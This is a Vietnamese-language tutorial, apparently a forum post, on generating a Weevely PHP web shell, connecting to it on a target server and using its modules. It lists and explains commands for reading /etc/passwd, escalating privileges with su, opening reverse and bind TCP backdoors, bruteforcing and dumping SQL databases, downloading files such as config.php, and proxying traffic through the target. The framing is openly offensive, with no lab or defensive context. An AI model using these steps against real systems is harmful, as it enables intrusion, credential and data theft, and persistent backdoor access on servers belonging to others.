Bài này chủ yếu hướng dẫn ae tạo con shell riêng mình, và sử dụng shell 1 số kịch bản thông dụng
weevely generate password shell.php Khởi tạo kết nối đến shell
weevely http://target/agent.php passwordTính năng:
:audit_etcpasswd Get /etc/passwd with different techniques.
:audit_filesystem Audit system files for wrong permissions.
:audit_phpconf Audit PHP configuration.
:audit_suidsgid Find files with SUID or SGID flags.
:shell_php Execute PHP commands.
:shell_su Elevate privileges with su command.
:shell_sh Execute Shell commands.
:system_info Collect system information.
:system_extensions Collect PHP and webserver extension list.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
:bruteforce_sql Bruteforce SQL database.
:file_enum Check existence and permissions of a list of paths.
:file_edit Edit remote file on a local editor.
:file_zip Compress or expand zip files.
:file_upload Upload file to remote filesystem.
:file_webdownload Download URL to the filesystem
:file_upload2web Upload file automatically to a web folder and get corresponding URL.
:file_mount Mount remote filesystem using HTTPfs.
:file_read Read remote file from the remote filesystem.
:file_gzip Compress or expand gzip files.
:file_tar Compress or expand tar archives.
:file_cd Change current working directory.
:file_find Find files with given names and attributes.
:file_check Get remote file information.
:file_grep Print lines matching a pattern in multiple files.
:file_download Download file to remote filesystem.
:file_cp Copy single file.
:file_touch Change file timestamp.
:file_rm Remove remote file.
:file_bzip2 Compress or expand bzip2 files.
:file_ls List directory content.
:sql_console Execute SQL query or run console.
:sql_dump Multi dbms mysqldump replacement.
:net_ifconfig Get network interfaces addresses.
:net_curl Perform a curl-like HTTP request.
:net_scan TCP Port scan.
:net_phpproxy Install PHP proxy on the target.
:net_proxy Proxify local HTTP traffic passing through the target.:system_info : Lấy thông OS
:system_extensions : Xem tất cả các mod đang chạy Apache Module
Quan trọng nhất là mở backdoor về :
:backdoor_tcpBạn mở cổng chờ sẵn từ Server để call.
1 số thuộc tính
trên máy client ta ung dung gõ lệnh connect đến
:backdoor_reversetcp : Mở cổng attacker chỉ định
trên máy attacker
:audit_etcpasswd : câu lệnh xem nội dung file passwd chỉ có tác dụng trong linux
:file_upload : Tải lên 1 file khác từ máy local lên
:file_webdownload : Tải file từ URL
:file_download -vector file config.php /home/hacking/Download/config.php
Tải 1 file bất kỳ về máy tính
:file_ls : liệt kệ các file và folder trong đường dẫn nào đó
ví dụ khi chạy trong window ta dùng: file_ls C:\\local\Appdata